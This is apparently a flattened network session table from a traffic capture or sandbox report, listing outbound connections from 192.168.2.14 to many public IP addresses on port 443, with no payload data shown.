                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16545192.168.2.1449524109.117.10.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16546192.168.2.143581085.183.218.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16547192.168.2.1455792145.87.49.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16548192.168.2.1446968191.12.128.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16549192.168.2.143773020.167.91.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16550192.168.2.1444360182.69.166.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16551192.168.2.145454665.95.211.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16552192.168.2.14497804.133.83.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16553192.168.2.1449148180.143.46.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16554192.168.2.143365223.168.250.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16555192.168.2.1434702131.247.192.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16556192.168.2.1446724104.86.90.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16557192.168.2.1442470119.83.224.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16558192.168.2.1451968143.181.188.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16559192.168.2.1438124175.232.98.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16560192.168.2.144515445.202.169.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16561192.168.2.1448570145.44.130.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16562192.168.2.145699031.43.135.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16563192.168.2.144461813.179.0.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16564192.168.2.1453764212.221.57.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16565192.168.2.1456758182.80.106.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16566192.168.2.1453654121.134.46.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16567192.168.2.1445342105.2.201.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16568192.168.2.1460150151.111.114.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16569192.168.2.1457684199.216.12.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16570192.168.2.1443618170.187.241.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16571192.168.2.1439852123.243.168.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16572192.168.2.14389722.5.13.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16573192.168.2.14587028.236.170.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16574192.168.2.1453678196.165.119.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16575192.168.2.143864474.123.116.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16576192.168.2.144019887.233.227.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16577192.168.2.1439960128.4.13.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16578192.168.2.144553273.138.106.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16579192.168.2.1453494154.206.52.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16580192.168.2.1440968178.42.236.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16581192.168.2.146061685.20.163.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16582192.168.2.145897497.153.63.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16583192.168.2.145431889.54.92.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16584192.168.2.143743886.161.145.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16585192.168.2.145280652.19.213.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16586192.168.2.145060079.43.206.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16587192.168.2.145060661.253.90.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16588192.168.2.1457516144.33.7.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16589192.168.2.1434168124.221.242.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16590192.168.2.1447896128.226.51.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16591192.168.2.145906024.154.185.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16592192.168.2.1453598210.34.193.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16593192.168.2.1433058105.129.86.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16594192.168.2.1438846150.237.175.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16595192.168.2.145851481.176.15.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16596192.168.2.1449150177.35.226.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16597192.168.2.1449798208.155.168.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16598192.168.2.146031692.131.235.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16599192.168.2.14553322.118.235.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16600192.168.2.1440216159.28.11.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16601192.168.2.1453250123.174.194.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16602192.168.2.1457756105.49.49.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16603192.168.2.1454914222.196.185.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16604192.168.2.1455736147.184.248.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16605192.168.2.145752247.101.84.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16606192.168.2.145942818.82.28.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16607192.168.2.144530247.130.169.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16608192.168.2.1434456116.206.1.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16609192.168.2.145800241.111.31.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16610192.168.2.1436018147.147.1.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16611192.168.2.143723886.37.97.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16612192.168.2.145120643.170.18.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16613192.168.2.1442914109.71.147.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16614192.168.2.143600851.250.75.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16615192.168.2.1433004131.1.8.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16616192.168.2.1459280146.102.139.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16617192.168.2.143917678.142.224.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16618192.168.2.1439310153.214.102.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16619192.168.2.1442390140.177.64.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16620192.168.2.1450304155.230.45.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16621192.168.2.144997274.186.220.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16622192.168.2.1450564128.175.156.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16623192.168.2.1436106151.174.24.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16624192.168.2.1451882159.81.76.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16625192.168.2.1451386122.253.4.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16626192.168.2.1448642164.56.8.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16627192.168.2.1432904166.53.144.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16628192.168.2.1441628171.153.35.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16629192.168.2.1443924219.104.200.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16630192.168.2.1455606203.17.160.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16631192.168.2.1443166187.112.214.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16632192.168.2.1450664151.179.106.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16633192.168.2.14554381.135.104.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16634192.168.2.1457270187.70.181.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16635192.168.2.1440860187.86.108.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16636192.168.2.143304231.147.194.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16637192.168.2.144701064.19.240.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16638192.168.2.1443900205.181.79.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16639192.168.2.144827020.38.161.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16640192.168.2.1458236208.77.151.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16641192.168.2.143686882.127.78.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16642192.168.2.145948053.50.120.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16643192.168.2.143721639.185.244.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16644192.168.2.1439518148.58.20.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16645192.168.2.1435148205.106.218.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16646192.168.2.1449250125.171.123.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16647192.168.2.1444542193.39.214.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16648192.168.2.145877848.105.243.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16649192.168.2.1435716202.38.212.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16650192.168.2.143769474.136.198.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16651192.168.2.1445646138.27.46.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16652192.168.2.144742012.85.22.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16653192.168.2.144110080.184.30.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16654192.168.2.143783473.42.221.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16655192.168.2.1454880126.89.236.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16656192.168.2.145257053.85.50.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16657192.168.2.1446392213.182.178.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16658192.168.2.1441682147.38.25.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16659192.168.2.144353290.61.195.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16660192.168.2.145648823.249.10.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16661192.168.2.1450948216.145.207.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16662192.168.2.1453472103.162.240.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16663192.168.2.1447292142.132.58.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16664192.168.2.1437360143.198.178.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16665192.168.2.1436080114.84.159.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16666192.168.2.1438630178.150.3.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16667192.168.2.143722648.218.7.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16668192.168.2.143446450.186.31.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16669192.168.2.1445292199.115.98.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16670192.168.2.1454806199.183.59.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16671192.168.2.1435440193.240.189.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16672192.168.2.1446000209.247.118.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16673192.168.2.1440440134.227.190.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16674192.168.2.14576802.91.197.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16675192.168.2.145219465.173.217.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16676192.168.2.144365269.102.58.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16677192.168.2.144258491.168.222.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16678192.168.2.1442884144.215.128.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16679192.168.2.144364893.191.220.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16680192.168.2.1443386107.174.50.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16681192.168.2.1445798196.142.241.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16682192.168.2.145148820.67.207.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16683192.168.2.1434340167.129.74.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16684192.168.2.144329452.32.43.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16685192.168.2.1453026143.204.249.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16686192.168.2.1435256212.142.212.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16687192.168.2.1448198155.93.153.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16688192.168.2.1439404137.47.232.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16689192.168.2.1455170102.146.137.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16690192.168.2.144924686.161.232.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16691192.168.2.1438994107.219.222.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16692192.168.2.143352093.165.6.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16693192.168.2.144842047.49.85.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16694192.168.2.143987680.50.213.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16695192.168.2.1460004205.181.103.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16696192.168.2.145303291.163.232.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16697192.168.2.145280093.211.176.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16698192.168.2.1450548178.246.204.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16699192.168.2.1434110196.165.218.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16700192.168.2.1435874191.242.46.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16701192.168.2.144854658.48.173.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16702192.168.2.145152295.68.193.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16703192.168.2.1446882138.75.245.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16704192.168.2.1435506223.238.32.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16705192.168.2.1436558124.191.192.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16706192.168.2.145668860.221.191.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16707192.168.2.1456392121.254.205.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16708192.168.2.145241819.244.148.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16709192.168.2.1440954122.24.1.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16710192.168.2.1452664218.99.0.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16711192.168.2.1458092128.248.28.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16712192.168.2.1435372172.199.173.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16713192.168.2.144570876.215.9.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16714192.168.2.1455482166.150.179.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16715192.168.2.1454754200.114.111.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16716192.168.2.1445228133.113.89.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16717192.168.2.1454118129.103.95.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16718192.168.2.144083680.38.149.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16719192.168.2.1439454153.209.106.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16720192.168.2.143633634.226.44.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16721192.168.2.143884059.114.188.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16722192.168.2.1434546176.26.125.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16723192.168.2.146077898.180.220.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16724192.168.2.144834224.57.234.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16725192.168.2.1434124152.176.49.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16726192.168.2.1433280161.75.203.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16727192.168.2.14497841.151.237.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16728192.168.2.145201698.225.82.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16729192.168.2.1437000180.172.229.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16730192.168.2.1448058179.107.201.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16731192.168.2.14356365.152.9.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16732192.168.2.1435976140.100.90.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16733192.168.2.145035438.217.143.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16734192.168.2.1447432149.50.217.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16735192.168.2.1452472182.83.86.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16736192.168.2.14390565.14.189.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16737192.168.2.1457590142.154.11.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16738192.168.2.144375270.176.24.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16739192.168.2.144003694.158.119.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16740192.168.2.144258458.111.31.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16741192.168.2.144973888.124.144.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16742192.168.2.1445228126.7.91.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16743192.168.2.1439272152.51.177.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16744192.168.2.1436632155.17.198.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16745192.168.2.143412893.89.215.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16746192.168.2.145734079.189.162.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16747192.168.2.1452492216.16.245.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16748192.168.2.144886671.205.153.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16749192.168.2.1444684106.105.155.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16750192.168.2.1459440128.46.162.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16751192.168.2.144987037.74.143.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16752192.168.2.146014483.61.250.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16753192.168.2.1440280136.8.201.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16754192.168.2.144873242.150.196.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16755192.168.2.1446320135.141.104.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16756192.168.2.145750441.153.3.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16757192.168.2.1458388157.63.20.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16758192.168.2.1454838114.10.48.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16759192.168.2.1432876151.247.195.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16760192.168.2.145713870.106.24.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16761192.168.2.14426809.90.199.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16762192.168.2.1444726172.195.176.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16763192.168.2.143419080.50.116.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16764192.168.2.145267234.236.225.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16765192.168.2.144418619.7.189.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
